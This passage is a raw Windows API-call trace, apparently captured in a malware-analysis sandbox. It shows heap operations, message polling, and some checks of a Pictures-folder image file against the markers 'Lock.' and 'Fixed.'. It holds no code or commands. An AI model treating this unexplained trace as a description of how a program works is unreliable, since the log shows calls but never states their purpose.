dwCmpFlags=0x1, lpString1="ky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0255.892] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1e) returned 0x24b3bc8 [0255.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JP0X848xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P0X848xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0X848xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X848xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="848xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ky.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0255.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.894] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0255.895] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0255.895] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.895] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0255.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.896] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0255.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/JP0X848xky.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3f0b60, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x8abfc350, ftLastAccessTime.dwHighDateTime=0x1d4cda8, ftLastWriteTime.dwLowDateTime=0x8abfc350, ftLastWriteTime.dwHighDateTime=0x1d4cda8, nFileSizeHigh=0x0, nFileSizeLow=0x695b, dwReserved0=0xa070047, dwReserved1=0x1e60e, cFileName="JP0X848xky.gif", cAlternateFileName="JP0X84~1.GIF")) returned 0xaa57a0 [0255.897] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0255.898] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.898] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.898] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.898] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.899] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.899] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.899] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.899] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.899] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.900] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.900] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.900] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.900] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.901] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.902] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0255.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0255.904] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.905] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.905] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.906] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0255.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.907] HeapFree (in: hHeap=0x25c0000, 